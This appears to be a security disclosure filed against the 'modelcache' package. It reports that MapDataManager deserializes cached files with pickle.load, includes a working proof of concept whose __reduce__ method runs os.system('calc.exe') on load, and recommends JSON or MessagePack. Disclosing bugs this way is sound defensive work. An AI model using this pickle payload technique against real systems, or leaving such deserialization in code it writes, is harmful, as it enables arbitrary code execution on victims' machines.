Description
Hi,
I've discovered a critical vulnerability in the MapDataManager class where pickle.load is used to deserialize cached data from a file. The use of pickle is inherently unsafe as it can execute arbitrary Python code during deserialization. This poses a significant risk, such as enabling remote code execution (RCE) by deserializing malicious objects.
PoC
Below is a simple PoC for this issue, I also attach a picture with 'dir' payload for your reference.
import pickle
import os
from modelcache.manager import get_data_manager
# Malicious class that executes arbitrary code when deserialized
class Exploit:
def __reduce__(self):
return (os.system, ('calc.exe',)) # calc.exe for windows
malicious_payload = pickle.dumps(Exploit())
with open("data_map.txt", "wb") as f: #Using data_map.txt like in factory.py
f.write(malicious_payload)
# Simulate loading the malicious cache file
data_manager = get_data_manager(data_path="data_map.txt", max_size=1000)
While the example Flask application uses SQLite as the cache base, similar risks could arise if user-controlled data is cached into the database and subsequently deserialized.
Recommendation
To mitigate this issue, I strongly recommend avoiding pickle for serialization. Safer alternatives like JSON or MessagePack should be used, as they do not allow code execution.
Thanks.
